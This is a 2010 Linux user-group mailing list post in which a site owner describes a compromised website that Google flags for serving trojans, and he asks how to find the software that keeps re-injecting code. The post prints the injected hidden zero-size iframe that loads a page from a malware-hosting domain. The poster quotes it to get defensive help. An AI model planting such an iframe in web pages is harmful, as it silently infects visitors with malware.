Re: [LIH] Security and Intrusion Detection

"H.S.Rai" <[email protected]>
Newsgroups gmane.user-groups.linux.india.help
Message-ID <[email protected]>
On Sun, Mar 14, 2010 at 10:18 AM, Raj Mathur <[email protected]> wrote:
>
> Apart from the standard places to look (/tmp, /var/tmp, all HTTP domain
> directories) you can use a tool called rkhunter (RootKit Hunter) to
> detect common Linux viruses and trojans.  If you were infected by a
> virus/trojan then standard approaches will pay off.

One of website is reported by Google as "Attacked":

> Site is listed as suspicious. Of the X1 pages we tested on the site
> over the past 90 days, X2 (85%) page(s) resulted  in malicious software
> being downloaded and installed without user consent.
> Malicious software includes 2 trojan(s). Malicious software is hosted
> on 4 domain(s), including odile-marco.com/, mangasit.com/,
> thekapita.com/. This site was hosted on 1 network(s) including
> AS17917 (ECLTELECOMM).

Most of the index.html and index.php files have at end:

<iframe src="http://odile-marco.com/lib/index.php" width=0 height=0
style="hidden" frameborder=0 marginheight=0 marginwidth=0
scrolling=no></iframe>

On deleting this line, it comes again. This appears to be quite common
problem. How to locate culprit software?

-- 
H.S.Rai

------------------------------------------------------------------------------
Download Intel&#174; Parallel Studio Eval
Try the new software tools for yourself. Speed compiling, find bugs
proactively, and fine-tune applications for parallel performance.
See why Intel Parallel Studio got high marks during beta.
http://p.sf.net/sfu/intel-sw-dev
lmpx.com only provides a reader for public news (NNTP) servers. It is not affiliated with the servers or forums shown here and is not responsible for the content of articles, which is written by their respective authors.